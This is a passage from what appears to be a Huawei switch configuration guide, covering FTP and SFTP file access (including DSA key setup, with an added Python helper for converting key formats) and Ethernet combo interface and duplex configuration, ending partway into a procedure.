files and managing files and directories on the FTP server. The configuration for accessing
other devices using FTP is simple, and FTP supports file transfer and file directory
management. FTP provides the authorization and authentication functions for managing files.
However, data is transferred in plaintext, which brings security risks.
FTP is applicable to file transfer when high network security is not required, and is often used
for downloading the system software from the FTP server and backing up the configuration
file.

Configuration Notes
l Before accessing files on the FTP server, ensure that routes are reachable between the
device and FTP server.
l The FTP protocol will bring risks to network security. The SFTP V2, Secure Copy
Protocol (SCP), or FTPS mode is recommended.
l This example applies to all versions and all models of S series switches.

Networking Requirements
As shown in Figure 4-6, the remote server at IP address 10.1.1.1/24 functions as the FTP
server. The device at IP address 10.2.1.1/24 functions as the FTP client and has reachable
routes to the FTP server.
The device needs to be upgraded. You need to download the system software from the FTP
server to the device and back up the current configuration file of the device to the FTP server.

Figure 4-6 Networking diagram for accessing files on another device using FTP

10.2.1.1/24 10.1.1.1/24
Internet

FTP Client FTP Server

Configuration Roadmap
The configuration roadmap is as follows:
1. Run the FTP software on the FTP server and configure an FTP user.
2. Use FTP to connect the device to the FTP server.
3. Upload and download files on the device using FTP commands.

Procedure
Step 1 Run the FTP software on the FTP server and configure an FTP user. For the detailed
operations, see the help document of the third-party FTP software.
Step 2 Use FTP to connect the device to the FTP server.
<HUAWEI> ftp 10.1.1.1
Trying 10.1.1.1 ...
Press CTRL+K to abort
Connected to 10.1.1.1.
220 FTP service ready.
User(10.1.1.1:(none)):admin
331 Password required for admin.
Enter password:
230 User logged in.

Step 3 Upload and download files on the device using FTP commands.
[ftp] binary //Set the file transfer mode to binary. The default mode is ASCII.
[ftp] get devicesoft.cc //Download the system software on the FTP server to the
device.
[ftp] put vrpcfg.zip //Upload the backup configuration file on the device to
the FTP server.
[ftp] quit

The ASCII mode is used to transfer text files, and the binary mode is used to transfer
programs including the system software (with the file name extension of .cc, .bin, or .pat),
images, voices, videos, compressed packages, and database files.
Step 4 Verify the configuration.
# Run the dir command on the device to check whether the system software is downloaded to
the device.
<HUAWEI> dir
Directory of flash:/

Idx Attr Size(Byte) Date Time FileName


0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
2 -rw- 4 Nov 17 2011 09:33:58 snmpnotilog.txt
3 -rw- 11,238 Mar 12 2012 21:15:56 private-data.txt
4 -rw- 7,717 Mar 12 2012 21:15:54 vrpcfg.zip
5 -rw- 14 Mar 13 2012 14:13:38 back_time_b
6 -rw- 106,616,955 Mar 13 2012 14:24:24 devicesoft.cc
7 drw- - Oct 31 2011 10:20:28 sysdrv
8 drw- - Feb 21 2012 17:16:36 compatible
9 drw- - Feb 09 2012 14:20:10 selftest
10 -rw- 19,174 Feb 20 2012 18:55:32 backup.cfg
11 -rw- 43,496 Dec 15 2011 20:59:36 20111215.zip
12 -rw- 588 Nov 04 2011 13:54:04 servercert.der
13 -rw- 320 Nov 04 2011 13:54:26 serverkey.der
14 drw- - Nov 04 2011 13:58:36 security
...

509,256 KB total (52,752 KB free)

# Check whether the file vrpcfg.zip is stored in the working directory on the FTP server.

----End

Configuration Files
None

4.6 Example for Accessing Files on Other Devices Using SFTP

Overview
SFTP is an SSH-based secure file transfer protocol, which uses secure connections for data
transmission. After a device is configured as an SFTP client, the remote SFTP server can
authenticate the client and encrypt data in bidirectional mode to ensure secure file transfer and
directory management.
SFTP is applicable to accessing files on other devices when high network security is required,
and is used for uploading and downloading logs.

Configuration Notes
l Before accessing files on the SSH server using SFTP, ensure that routes are reachable
between the device and SSH server.
l The SFTP V1 protocol will bring risks to network security. The SFTP V2 or FTPS mode
is recommended.
l This example applies to all versions and all models of S series switches.

Networking Requirements

As shown in Figure 4-7, the routes between the SSH server and clients client001 and
client002 are reachable. A Huawei device is used as the SSH server in this example.
The clients client001 and client002 are required to connect to the SSH server in password and
DSA authentication modes respectively to ensure secure access to files on the SSH server.

Figure 4-7 Networking diagram for accessing files on another device using SFTP
10.2.1.1/24

client001 10.1.1.1/24
Internet

SSH Server
10.3.1.1/24
client002

Configuration Roadmap
The configuration roadmap is as follows:
1. Generate a local key pair on the SSH server and enable the SFTP server function to
implement secure data exchange between the server and client.
2. Configure the clients client001 and client002 on the SSH server to log in to the SSH
server in password and DSA authentication modes.
3. Generate a local key pair on client002 and configure the generated DSA public key on
the SSH server, which implements authentication for the client when a user logs in to the
server from the client.
4. On the SSH server, enable client001 and client002 to log in to the SSH server using
SFTP and access the files.

Procedure
Step 1 On the SSH server, generate a local key pair and enable the SFTP server function.
<HUAWEI> system-view
[HUAWEI] sysname SSH Server
[SSH Server] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: SSH Server_Host_DSA.
Info: The key modulus can be any one of the following : 1024, 2048.
Info: If the key modulus is greater than 512, it may take a few minutes.
Please input the modulus [default=2048]: //Press Enter. The default key length (2048 bits) is used.
Info: Generating keys........
Info: Succeeded in creating the DSA host keys.
[SSH Server] sftp server enable //Enable the SFTP server function.
Info: Succeeded in starting the SFTP server.

Step 2 Create SSH users on the SSH server.
# Configure VTY user interfaces on the SSH server.
[SSH Server] user-interface vty 0 4 //Enter the user interface views of VTY 0
to VTY 4.
[SSH Server-ui-vty0-4] authentication-mode aaa //Set the authentication mode of
users in VTY 0 to VTY 4 to AAA.
[SSH Server-ui-vty0-4] protocol inbound ssh //Configure the user interface
views of VTY 0 to VTY 4 to support SSH.
[SSH Server-ui-vty0-4] user privilege level 3 //Set the user level to 3.
[SSH Server-ui-vty0-4] quit

# Create an SSH user named client001 and configure the password authentication mode for
the user.
[SSH Server] ssh user client001 //Create an SSH user.
[SSH Server] ssh user client001 authentication-type password //Set the
authentication mode to password authentication.
[SSH Server] ssh user client001 service-type sftp //Set the user service type
to SFTP.
[SSH Server] ssh user client001 sftp-directory flash: //Set the SFTP service
authorized directory to flash:.
[SSH Server] aaa
[SSH Server-aaa] local-user client001 password irreversible-cipher Helloworld@6789 //Set the login password to Helloworld@6789.
[SSH Server-aaa] local-user client001 service-type ssh //Set the user service type to SSH.
[SSH Server-aaa] local-user client001 privilege level 3 //Set the user level to 3.
[SSH Server-aaa] quit

# Create an SSH user named client002 and configure the DSA authentication mode for the
user.
[SSH Server] ssh user client002 //Create an SSH user.
[SSH Server] ssh user client002 authentication-type dsa //Set the
authentication mode to DSA authentication.
[SSH Server] ssh user client002 service-type sftp //Set the user service type
to SFTP.
[SSH Server] ssh user client002 sftp-directory flash: //Set the SFTP service
authorized directory to flash:.

Step 3 Generate a local key pair on client002 and configure the generated DSA public key on the
SSH server.
# Generate a local key pair on client002.
<HUAWEI> system-view
[HUAWEI] sysname client002
[client002] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: SSH Server_Host_DSA.
Info: The key modulus can be any one of the following : 1024, 2048.
Info: If the key modulus is greater than 512, it may take a few minutes.
Please input the modulus [default=2048]: //Press Enter. The default key length (2048 bits) is used.
Info: Generating keys........
Info: Succeeded in creating the DSA host keys.

# Check the DSA public key generated on client002.
[client002] display dsa local-key-pair public
=====================================================
Time of Key pair created:2014-08-27 06:35:16+08:00
Key name : client002_Host_DSA
Key modulus : 2048
Key type : DSA encryption Key
Key fingerprint: b7:68:86:90:d8:19:f3:e6:4a:f2:e9:fd:e4:24:ef:a5
=====================================================
Key code:
30820322
02820100
DEDEBA5C 8244DCB8 E696917C EFEBC0B3 E6FB60BE
8B9E36D3 E4EB9CD6 EB7FD210 219AC0F4 1AD47BF1
EACD435D 39AFA8FA CB6A7819 305EE147 E428912E
60452B37 CA17D611 C2EE4C46 B4BC7726 54C26856
A99ECFA5 D800367B 31A90522 F139496F 4182DBFD
AAB59973 9AB02185 856A881F 9197368B 92DBF684
9D1C746B A27E12F9 8A28E4B6 D0587D65 5979A750
5413E91E FC961C3F 79209625 CFA8D7D4 69FA35A3
9E37B614 047D535D CD63AF30 58B3A25B 79C714B6
326B7DB6 067EBF15 3CC1A720 B0E1A7E3 9C13FEB3
BA26E6B0 52DC5BFF EE7C5C52 148FE6C2 40738FBB
8F05D416 B2B5DD72 E3629BB5 9244BF9F A29C4FCD
4EA0EE50 1FC6695D 03D68D51 9324E493
0214
C6C484E1 F0076B8A FCAD302B 98B50A3A 542ABEBB
02820100
3AC11746 EE959CBD 30F669C5 7E290BC4 7CB5BBFD
96AE9215 7A29C723 72FE8A02 EBED3B76 BE810B42
21AD8D32 F7723F83 59F46B66 FF7805CC 3F86D5D6
5BD424BD 70677EFF 1ACF9B3C CE02CD40 46560DA4
2036205C 6EFAB148 66E6A106 0DF6258B EE31CFE7
4B6C59B4 6FE59A9F BE64F982 EC36A669 FF597FB7
9A56E32E C15A0659 3D17C407 29F587C7 74959017
62B08070 24564B2E E79C6E1D 86793548 76CC662A
1D3DE1D1 2C79E102 C0B10E5C 9C4428B3 AEB93278
26D4CDE5 189A93EA 531E0FF8 2199EF35 DF038976
4538434F F39924F0 5BF17AC8 8E340991 B5EA0A62
A915EE63 F660C092 360C5D2D 796AF230 DB7461F7
C15B6DBA 65C9EFAB 247DB13D 4942E2FF
02820100
D7C6399A 86F7B38C 85168EF8 692BD9B4 01AA7BCD
98559075 98039259 0C54818C 650A95C7 0A5250EB
12124E5B C4123350 C190CC8B 4FFFD418 7E8F113F
6C36AB4B A56D2D1D 2C874C75 8400DAFE 4BABF957
4EDC8E7C DF5934DB 3AD717E5 50B1096B C0B46DE5
3FB508FA CB76FF1C 42CF7082 7DDEEB47 5C5C4F64
B1C8815C 496AC1E0 04C10EDD FE849B76 6DA15B48
0C9CF0B1 10BDDC08 41A65C28 8E21ADC6 48A93DF6
14552C1F 76A401AE E06E482D 6582052E 5B11A678
A467B38A B77C1C55 D367E253 FFA44841 FC38A462
B9AC24E6 DAD01628 F09ED629 58F666C1 1DEF7BD0
634C3D13 D75F2614 8CB49AFC 498A5195 F443CA4D
C02FF228 A90D7593 AE46C5D0 4B224FEE
Host public key for PEM format code:
---- BEGIN SSH2 PUBLIC KEY ----
AAAAB3NzaC1kc3MAAAEBAN7eulyCRNy45paRfO/rwLPm+2C+i5420+TrnNbrf9IQ
IZrA9BrUe/HqzUNdOa+o+stqeBkwXuFH5CiRLmBFKzfKF9YRwu5MRrS8dyZUwmhW
qZ7PpdgANnsxqQUi8TlJb0GC2/2qtZlzmrAhhYVqiB+RlzaLktv2hJ0cdGuifhL5
iijkttBYfWVZeadQVBPpHvyWHD95IJYlz6jX1Gn6NaOeN7YUBH1TXc1jrzBYs6Jb
eccUtjJrfbYGfr8VPMGnILDhp+OcE/6zuibmsFLcW//ufFxSFI/mwkBzj7uPBdQW
srXdcuNim7WSRL+fopxPzU6g7lAfxmldA9aNUZMk5JMAAAAVAMbEhOHwB2uK/K0w
K5i1CjpUKr67AAABADrBF0bulZy9MPZpxX4pC8R8tbv9lq6SFXopxyNy/ooC6+07
dr6BC0IhrY0y93I/g1n0a2b/eAXMP4bV1lvUJL1wZ37/Gs+bPM4CzUBGVg2kIDYg
XG76sUhm5qEGDfYli+4xz+dLbFm0b+Wan75k+YLsNqZp/1l/t5pW4y7BWgZZPRfE
Byn1h8d0lZAXYrCAcCRWSy7nnG4dhnk1SHbMZiodPeHRLHnhAsCxDlycRCizrrky
eCbUzeUYmpPqUx4P+CGZ7zXfA4l2RThDT/OZJPBb8XrIjjQJkbXqCmKpFe5j9mDA
kjYMXS15avIw23Rh98Fbbbplye+rJH2xPUlC4v8AAAEAVkz2m0fokxPL5DekN8U4
2SkvxBhh7W+pMLesuDOBY9PIqfwcZqY23Oi7/eJGojmX0wYTOWi8t09Qn/LmeFNt
AEaxHc4nLmvjxDuyjoTSA/AAYJDYJ6HWZoScy3mzDCUtEMGuaL/6SRUuH5wf9hMf
LZzmb6ETrf8S5RZWVyZv3TKm3/FEAH7PNQYe8BYYG3SCfvgtqYQzRTZrDL6wLbCo
otdHydlhfz9CtIYH3gfhnjXoq/X6HLQAFTexhBuoJ7nCtjC9c1HhJFicadQK2iY/
AOOu8jCp0l6vOUH4cniOONh6Mts9UiJNYnvZsjVJFzdkRsNpvcMBhK4/NneGPPMN
+A==
---- END SSH2 PUBLIC KEY ----
Public key code for pasting into OpenSSH authorized_keys file :
ssh-dss AAAAB3NzaC1kc3MAAAEBAN7eulyCRNy45paRfO/rwLPm+2C+i5420+TrnNbrf9IQIZrA9BrUe/HqzUNdOa+o+stqeBkwXuFH5CiRLmBFKzfKF9YRwu5MRrS8dyZUwmhWqZ7PpdgANnsxqQUi8TlJb0GC2/2qtZlzmrAhhYVqiB+RlzaLktv2hJ0cdGuifhL5iijkttBYfWVZeadQVBPpHvyWHD95IJYlz6jX1Gn6NaOeN7YUBH1TXc1jrzBYs6JbeccUtjJrfbYGfr8VPMGnILDhp+OcE/6zuibmsFLcW//ufFxSFI/mwkBzj7uPBdQWsrXdcuNim7WSRL+fopxPzU6g7lAfxmldA9aNUZMk5JMAAAAVAMbEhOHwB2uK/K0wK5i1CjpUKr67AAABADrBF0bulZy9MPZpxX4pC8R8tbv9lq6SFXopxyNy/ooC6+07dr6BC0IhrY0y93I/g1n0a2b/eAXMP4bV1lvUJL1wZ37/Gs+bPM4CzUBGVg2kIDYgXG76sUhm5qEGDfYli+4xz+dLbFm0b+Wan75k+YLsNqZp/1l/t5pW4y7BWgZZPRfEByn1h8d0lZAXYrCAcCRWSy7nnG4dhnk1SHbMZiodPeHRLHnhAsCxDlycRCizrrkyeCbUzeUYmpPqUx4P+CGZ7zXfA4l2RThDT/OZJPBb8XrIjjQJkbXqCmKpFe5j9mDAkjYMXS15avIw23Rh98Fbbbplye+rJH2xPUlC4v8AAAEAVkz2m0fokxPL5DekN8U42SkvxBhh7W+pMLesuDOBY9PIqfwcZqY23Oi7/eJGojmX0wYTOWi8t09Qn/LmeFNtAEaxHc4nLmvjxDuyjoTSA/AAYJDYJ6HWZoScy3mzDCUtEMGuaL/6SRUuH5wf9hMfLZzmb6ETrf8S5RZWVyZv3TKm3/FEAH7PNQYe8BYYG3SCfvgtqYQzRTZrDL6wLbCootdHydlhfz9CtIYH3gfhnjXoq/X6HLQAFTexhBuoJ7nCtjC9c1HhJFicadQK2iY/AOOu8jCp0l6vOUH4cniOONh6Mts9UiJNYnvZsjVJFzdkRsNpvcMBhK4/NneGPPMN+A== dsa-key
# Configure the generated DSA public key on the SSH server. The bold part in the display
command output indicates the generated DSA public key. Copy the key to the SSH server.

[SSH Server] dsa peer-public-key dsakey001 encoding-type der
[SSH Server-dsa-public-key] public-key-code begin
[SSH Server-dsa-key-code] public-key-code end
[SSH Server-dsa-public-key] peer-public-key end

# On the SSH server, bind the DSA public key to client002.
[SSH Server] ssh user client002 assign dsa-key dsakey001
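The same key appears above in SSH2 form, in OpenSSH authorized_keys form, and as the DER hex entered after dsa peer-public-key dsakey001 encoding-type der. The following Python is an added example (not from the Huawei document): it transcodes an OpenSSH ssh-dss line into that DER hex and back, and computes the SHA256 fingerprint so the client's key can be compared with what was actually pasted before ssh user client002 assign dsa-key is run. The DER layout (one SEQUENCE holding the four INTEGERs p, q, g, y) is inferred from the hex the page shows; the sample parameters are constructed and are not a usable DSA key.

```python
import base64
import hashlib
import struct

def _ssh_string(data: bytes) -> bytes:
    """RFC 4251 'string': 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data

def _int_bytes(v: int) -> bytes:
    """Minimal big-endian two's-complement bytes of a positive integer; a value whose
    high bit is set gets a leading 0x00. Serves both SSH mpint and DER INTEGER."""
    if v <= 0:
        raise ValueError("DSA parameters must be positive")
    return v.to_bytes((v.bit_length() + 8) // 8, "big")

def _read_string(buf: bytes, off: int):
    """Read one RFC 4251 string at off; return (bytes, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    end = off + 4 + n
    if end > len(buf):
        raise ValueError("truncated SSH string")
    return buf[off + 4:end], end

def build_openssh_dss(p: int, q: int, g: int, y: int, comment: str = "dsa-key") -> str:
    """Build an authorized_keys line 'ssh-dss <base64 blob> <comment>' (RFC 4253 blob)."""
    blob = _ssh_string(b"ssh-dss") + b"".join(_ssh_string(_int_bytes(v)) for v in (p, q, g, y))
    return "ssh-dss %s %s" % (base64.b64encode(blob).decode(), comment)

def parse_openssh_dss(line: str) -> dict:
    """Parse an authorized_keys ssh-dss line into {'p', 'q', 'g', 'y'} integers."""
    fields = line.split()
    if len(fields) < 2 or fields[0] != "ssh-dss":
        raise ValueError("not an ssh-dss key line")
    blob = base64.b64decode(fields[1], validate=True)
    kind, off = _read_string(blob, 0)
    if kind != b"ssh-dss":
        raise ValueError("blob type %r does not match ssh-dss" % kind)
    key = {}
    for name in ("p", "q", "g", "y"):
        raw, off = _read_string(blob, off)
        key[name] = int.from_bytes(raw, "big", signed=True)
    if off != len(blob):
        raise ValueError("trailing bytes after y")
    return key

def _der_len(n: int) -> bytes:
    """DER length: short form below 0x80, otherwise 0x80|count then the length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def dss_to_der(key: dict) -> bytes:
    """SEQUENCE { INTEGER p, INTEGER q, INTEGER g, INTEGER y }: the layout the page's hex
    shows (30 82 03 22 = SEQUENCE of 0x322 bytes, then 02 82 01 00 p, 02 14 q, g, y)."""
    parts = [_int_bytes(key[n]) for n in ("p", "q", "g", "y")]
    body = b"".join(b"\x02" + _der_len(len(x)) + x for x in parts)
    return b"\x30" + _der_len(len(body)) + body

def _read_tlv(buf: bytes, off: int, tag: int):
    # Read one DER element with the given tag; return (contents, next offset).
    if off >= len(buf) or buf[off] != tag:
        raise ValueError("expected tag 0x%02X at offset %d" % (tag, off))
    n, off = buf[off + 1], off + 2
    if n & 0x80:  # long-form length
        k = n & 0x7F
        n, off = int.from_bytes(buf[off:off + k], "big"), off + k
    if off + n > len(buf):
        raise ValueError("DER element runs past end of data")
    return buf[off:off + n], off + n

def der_to_dss(der: bytes) -> dict:
    """Inverse of dss_to_der: decode hex pasted on the switch back into p, q, g, y."""
    seq, end = _read_tlv(der, 0, 0x30)
    if end != len(der):
        raise ValueError("trailing bytes after SEQUENCE")
    key, off = {}, 0
    for name in ("p", "q", "g", "y"):
        raw, off = _read_tlv(seq, off, 0x02)
        key[name] = int.from_bytes(raw, "big", signed=True)
    return key

def format_public_key_code(der: bytes, groups_per_line: int = 5) -> list:
    """Upper-case hex in 8-digit groups, the notation of the page's public-key-code lines."""
    h = der.hex().upper()
    groups = [h[i:i + 8] for i in range(0, len(h), 8)]
    return [" ".join(groups[i:i + groups_per_line]) for i in range(0, len(groups), groups_per_line)]

def sha256_fingerprint(line: str) -> str:
    """The fingerprint 'ssh-keygen -lf' prints: compare the client's value with that of
    build_openssh_dss(**der_to_dss(pasted_bytes)) before assigning the key to a user."""
    digest = hashlib.sha256(base64.b64decode(line.split()[1])).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

# Constructed sample parameters: small made-up numbers, NOT a usable DSA key (format demo only).
SAMPLE_P = 0xD1F3A5B7C9E02468ACE13579BDF02468ACE13579BDF12345
SAMPLE_Q = 0xA1B2C3D4E5F60718293A4B5C6D7E8F9001122334
SAMPLE_G = 0x2B4D6F8A1C3E5072940B6D8FA1C3E5F70913355779BBDDF1
SAMPLE_Y = 0x8F1E2D3C4B5A69788796A5B4C3D2E1F00F1E2D3C4B5A6978
SAMPLE_LINE = build_openssh_dss(SAMPLE_P, SAMPLE_Q, SAMPLE_G, SAMPLE_Y)
```

Run dss_to_der(parse_openssh_dss(line)) on the real authorized_keys line and paste format_public_key_code() of the result between public-key-code begin and public-key-code end; decoding the switch's hex with der_to_dss() and fingerprinting it confirms both copies are the same key.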

Step 4 Connect SFTP clients to the SSH server.

# Enable the first authentication function on the SSH clients upon the first login.
<HUAWEI> system-view
[HUAWEI] sysname client001
[client001] ssh client first-time enable //Enable the first authentication
function on client001.
[client002] ssh client first-time enable //Enable the first authentication
function on client002.

# Log in to the SSH server from client001 in password authentication mode.
[client001] sftp 10.1.1.1
Please input the username:client001
Trying 10.1.1.1 ...
Press CTRL+K to abort
Connected to 10.1.1.1 ...
password:SSH_SERVER_CODE
Please select public key type for user authentication [R for RSA; D for DSA;
Enter for Skip publickey authentication; Ctrl_C for Cancel], Please select [R, D,
Enter or Ctrl_C]:D
Enter password:
sftp-client>

# Log in to the SSH server from client002 in DSA authentication mode.
[client002] sftp 10.1.1.1
Please input the username:client002
Trying 10.1.1.1 ...
Press CTRL+K to abort
Connected to 10.1.1.1 ...
password:SSH_SERVER_CODE
Please select public key type for user authentication [R for RSA; D for DSA;
Enter for Skip publickey authentication; Ctrl_C for Cancel], Please select [R, D,
Enter or Ctrl_C]:D
sftp-client>

Step 5 Verify the configuration.

Run the display ssh server status command on the SSH server to check whether the SFTP
service is enabled. Run the display ssh user-information command to check information
about SSH users on the server.
# Check the status of the SSH server.
[SSH Server] display ssh server status
SSH version :1.99
SSH connection timeout :60 seconds
SSH server key generating interval :0 hours
SSH authentication retries :3 times
SFTP server :Enable
Stelnet server :Disable
Scp server :Disable
SSH server source :0.0.0.0
ACL4 number :0
ACL6 number :0

# Check information about SSH users.
[SSH Server] display ssh user-information
User 1:
User Name : client001
Authentication-type : password
User-public-key-name : -
User-public-key-type : -
Sftp-directory : flash:
Service-type : sftp
Authorization-cmd : No
User 2:
User Name : client002
Authentication-type : dsa
User-public-key-name : dsakey001
User-public-key-type : dsa
Sftp-directory : flash:
Service-type : sftp
Authorization-cmd : No

----End

Configuration Files
l Configuration file of the SSH server
#
sysname SSH Server
#
dsa peer-public-key dsakey001 encoding-type der
public-key-code begin
public-key-code end
peer-public-key end
#
aaa
local-user client001 password irreversible-cipher %^%#-=9Z)M,-aL$_U%#$W^1T-\}Fqpe$E<#H$J<6@KTSL/J'\}I-%^%#
local-user client001 privilege level 3
local-user client001 service-type ssh
#
sftp server enable
ssh user client001
ssh user client001 authentication-type password
ssh user client001 service-type sftp
ssh user client001 sftp-directory flash:
ssh user client002
ssh user client002 authentication-type dsa
ssh user client002 assign dsa-key dsakey001
ssh user client002 service-type sftp
ssh user client002 sftp-directory flash:
#
user-interface vty 0 4
authentication-mode aaa
user privilege level 3
#
return

l Configuration file of client001
#
sysname client001
#
ssh client first-time enable
#
return

l Configuration file of client002
#
sysname client002
#
ssh client first-time enable
#
return

5 Typical Ethernet Interface Configuration

About This Chapter

5.1 Example for Configuring a Combo Interface
5.2 Example for Configuring the Rate and Duplex Mode of an Ethernet Interface
5.3 Example for Switching an Interface Between Layer 2 and Layer 3 Modes
5.4 Example for Configuring Port Isolation

5.1 Example for Configuring a Combo Interface

Introduction to a Combo Interface
A combo interface consists of a GE electrical interface and a GE optical interface on the
panel. The multiplexed electrical and optical interfaces cannot work at the same time. When
one interface works, the other interface is disabled. You can use the electrical or optical
interface according to networking requirements.
The electrical and optical interfaces share one interface view. When you enable the electrical
or optical interface, configure the interface attributes (such as the rate and duplex mode) in the
same interface view.

Configuration Notes
l Usage restrictions:
– The electrical and optical interfaces of a combo interface are multiplexed. The
optical interface cannot have a copper module installed.
– When a combo interface works in auto mode and the combo optical interface has an
optical module installed, the combo interface works as an optical interface after the
device restarts.
– You can configure the working mode of the combo interface based on the remote
interface type. If the local combo electrical interface is connected to a remote
electrical interface, configure the combo interface to work in copper mode. If the
local combo optical interface is connected to a remote optical interface, configure
the combo interface to work in fiber mode. If the local combo interface is
configured to work in a different mode from the remote interface, the two interfaces
cannot communicate.
l This example applies to switches that support the combo interface.

Networking Requirements
As shown in Figure 5-1, PC1, PC2, and PC3 connect to GE1/0/1, GE1/0/2 and GE1/0/3 of
the Switch respectively. The Switch connects to the Internet through the combo interface
GE1/0/4. You can configure the working mode of the combo interface based on the remote
interface type. In this example, the remote interface at the Internet side is an electrical
interface.

Figure 5-1 Networking diagram for configuring the working mode of a combo interface (Switch: GE1/0/1, GE1/0/2, and GE1/0/3 to PC1, PC2, and PC3; combo interface GE1/0/4 to the Internet)

Configuration Roadmap
The configuration roadmap is as follows:
l Configure the combo interface to work as an electrical interface. This configuration
ensures that the combo interface's working mode does not change when the transmission
medium changes, for example, a GE optical module is installed.

Procedure
Step 1 Configure the combo interface GE1/0/4 to work as an electrical interface.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] interface gigabitethernet 1/0/4
[Switch-GigabitEthernet1/0/4] combo-port copper //Configure the combo interface
to work as an electrical interface. By default, the combo interface's working
mode is auto.
[Switch-GigabitEthernet1/0/4] quit

Step 2 Verify the configuration.

Run the display interface gigabitethernet 1/0/4 command in any view to check the working
mode of the combo interface.
[Switch] display interface gigabitethernet 1/0/4
...
Port Mode: FORCE COPPER
Speed : 1000, Loopback: NONE
Duplex: FULL, Negotiation: ENABLE
Mdi : AUTO, Flow-control: DISABLE
...

If COMBO AUTO is displayed, the combo interface automatically selects the working mode.
If FORCE FIBER is displayed, the combo interface is configured to work as an optical
interface. If FORCE COPPER is displayed, the combo interface is configured to work as an
electrical interface. The preceding command output shows that the combo interface is
configured to work as an electrical interface.

----End

Configuration File
Configuration file of the Switch
#
sysname Switch
#
interface GigabitEthernet1/0/4
combo-port copper
#
return

5.2 Example for Configuring the Rate and Duplex Mode of an Ethernet Interface

Introduction to the Rate and Duplex Mode of Ethernet Interfaces
Interfaces can work in the following two duplex modes:
l Half-duplex mode: An interface in this mode only receives or sends data at a time within
a specified transmission distance.
l Full-duplex mode: An interface in this mode receives and sends data at the same time.
The maximum throughput in full-duplex mode is double that in half-duplex mode, and
the transmission distance is not limited.
You can configure the rate and duplex mode of an Ethernet interface working in either auto-
negotiation or non-auto-negotiation mode.
l In auto-negotiation mode, interfaces at both ends of a link negotiate the rate and duplex
mode. If the negotiation succeeds, the two interfaces use the same duplex mode and rate.
The auto-negotiation function takes effect only when both the connected devices support
it. If the remote device does not support auto-negotiation or uses a different auto-
negotiation mode, the connected interfaces may be Down.
l You can configure the local interface to work in non-auto-negotiation mode and
manually configure the interface rate and duplex mode in the following situations:
– The remote device does not support auto-negotiation.
– After auto-negotiation is configured, the local and remote devices cannot communicate.
– After auto-negotiation is configured, the physical link between the local and remote
devices is connected, but a lot of error packets are generated or packet loss occurs.

Configuration Notes
l Usage restrictions
– Ethernet interfaces at both ends of a link must work in the same auto-negotiation
mode. Otherwise, the interfaces may be Down.
– When the working rate of a GE electrical interface is 1000 Mbit/s, the interface
supports only the full-duplex mode and does not need to negotiate the duplex mode
with the remote interface.

– Interfaces at both ends of a link must use the same rate and duplex mode.
– Table 5-1 lists the rate and duplex mode of Ethernet interfaces.

Table 5-1 Rate and duplex mode of Ethernet interfaces

| Interface Type | Transmission Medium | Rate (Mbit/s) | Duplex Mode | Auto-Negotiation Mode | Remarks |
| --- | --- | --- | --- | --- | --- |
| GE electrical interface | Network cable | 10 | Full-duplex/half-duplex | Supported | Physical service interfaces of the X1E series cards on a modular switch do not support the duplex mode configuration. |
| GE electrical interface | Network cable | 100 | Full-duplex/half-duplex | Supported | (as above) |
| GE electrical interface | Network cable | 1000 | Full-duplex | Supported | (as above) |
| GE optical interface | FE optical module | 100 | Full-duplex | Not supported | By default, auto-negotiation is enabled on GE optical interfaces and rate auto-negotiation is disabled. You can run the speed auto-negotiation command to enable rate auto-negotiation. |
| GE optical interface | GE optical module | 1000 | Full-duplex | Supported | (as above) |
| GE optical interface | GE copper module | 1000 | Full-duplex/half-duplex | Supported | - |
| XGE (10GE) optical interface | XGE optical module | 10000 | Full-duplex | Not supported | See the XGE remarks below the table. |
| XGE (10GE) optical interface | XGE/GE optical module | 10000/1000 | Full-duplex | Not supported | (as above) |
| XGE (10GE) optical interface | GE optical module | 1000 | Full-duplex | Supported | (as above) |
| XGE (10GE) optical interface | GE copper module | 1000 | Full-duplex | Supported | (as above) |
| 40GE optical interface | 40GE optical module | 40000 | Full-duplex | Not supported | - |
| 40GE optical interface | High-speed cable | 40000 | Full-duplex | Supported | When you run the display interface command on a 40GE optical interface that has a high-speed cable installed, the command output shows that auto-negotiation is enabled. However, you cannot run the negotiation auto command to configure the auto-negotiation mode. |
| 100GE optical interface | 100GE optical module | 100000 | Full-duplex | Not supported | Only EE series cards support 100GE optical interfaces. |

Remarks for XGE (10GE) optical interfaces:
l The XGE interfaces on the ACU2, ET1D2IPS0S00, ET1D2FW00S00, ET1D2FW00S01, and
ET1D2FW00S02 cards do not support the configuration of auto-negotiation mode and interface
rate.
l Assume that an XGE optical interface has an XGE/GE optical module installed and the
interface rate is set to 1000 Mbit/s by running the speed auto 1000 command. When you run
the display interface command on the interface, the command output shows that auto-
negotiation is enabled. However, you cannot run the negotiation auto command to configure
the auto-negotiation mode.
l Only switches in V200R007 and later versions support XGE/GE optical modules.

Networking Requirements
As shown in Figure 5-2, Server1, Server2, and Server3 form a server cluster and connect to
GE1/0/1, GE1/0/2, and GE1/0/3 of the Switch respectively. The Switch connects to the
Internet through GE1/0/4.

Due to limitations of network adapters on the servers, GE1/0/1, GE1/0/2, and GE1/0/3 can
only work in half-duplex mode after negotiating with connected server interfaces. As a result,
packet loss occurs when the service traffic volume is high. In addition, the rate is negotiated
to 1000 Mbit/s for GE1/0/1, GE1/0/2, and GE1/0/3. When the three servers concurrently send
data at the rate of 1000 Mbit/s, the outbound interface GE1/0/4 may be congested. Users
require that packet loss and congestion do not occur.

Figure 5-2 Networking diagram for configuring the rate and duplex mode in non-auto-negotiation mode (Switch: GE1/0/1, GE1/0/2, and GE1/0/3 to Server1, Server2, and Server3; GE1/0/4 to the Internet)

Configuration Roadmap
The configuration roadmap is as follows:

l Configure the switch interfaces to work in non-auto-negotiation mode to prevent the
interface rate from being affected by the network adapter rate on the servers.
l Set the duplex mode to full-duplex for the interfaces working in non-auto-negotiation
mode to avoid packet loss.
l Set the rate to 100 Mbit/s for the interfaces working in non-auto-negotiation mode to
avoid congestion on the outbound interface.

Procedure
